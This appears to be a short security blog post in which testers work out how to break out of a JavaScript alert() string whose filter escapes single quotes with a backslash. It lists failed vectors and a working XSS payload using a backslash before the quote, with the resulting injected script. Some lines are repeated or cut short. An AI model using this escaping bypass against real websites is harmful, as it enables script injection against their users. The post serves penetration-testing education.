Chintan, Ronnie and I were discussing about one issue regarding how to bypass a specific XSS filter in alert message box. We were unable to breakout.
Chintan's problem statement was:
I am running into one issue with XSS and was interested if there is any way I can bypass it.
Following the response code where user supplied input is embedded. Input is taken via a text box.
Following the response code where user supplied input is embedded. Input is taken via a text box.
<script type="text/javascript">alert(' No Information is found for the card 1');script>
User supplied input 1 is highlighted in red. I am trying to break out of this alert box, however when a single quote is given as input, the output is escaped using a backslash. It is as follows:
Input: 1'
Output: <script type="text/javascript">alert('
I am using IE 8 and tried using back ticks just to check if I can get around this limitation, however it did not work.
Any suggestion on how to break out of this would be much helpful.
All characters except the single quote, <!-- and </script> are working.
I tried the following vector to escape out:
Input: 1`);alert(1);(`');
Output: <script type="text/javascript">alert('
So, after a serires of discussion we came out with the solution:
;/\');alert(1);// or \');alert(\'XSS
And now this was successful bypass:
<script type="text/javascript">alert('No Information is found for the card ;/\\');alert("XSS");//');</script>
So, we successfully bypassed it
So, we successfully bypassed it
Cool job! :)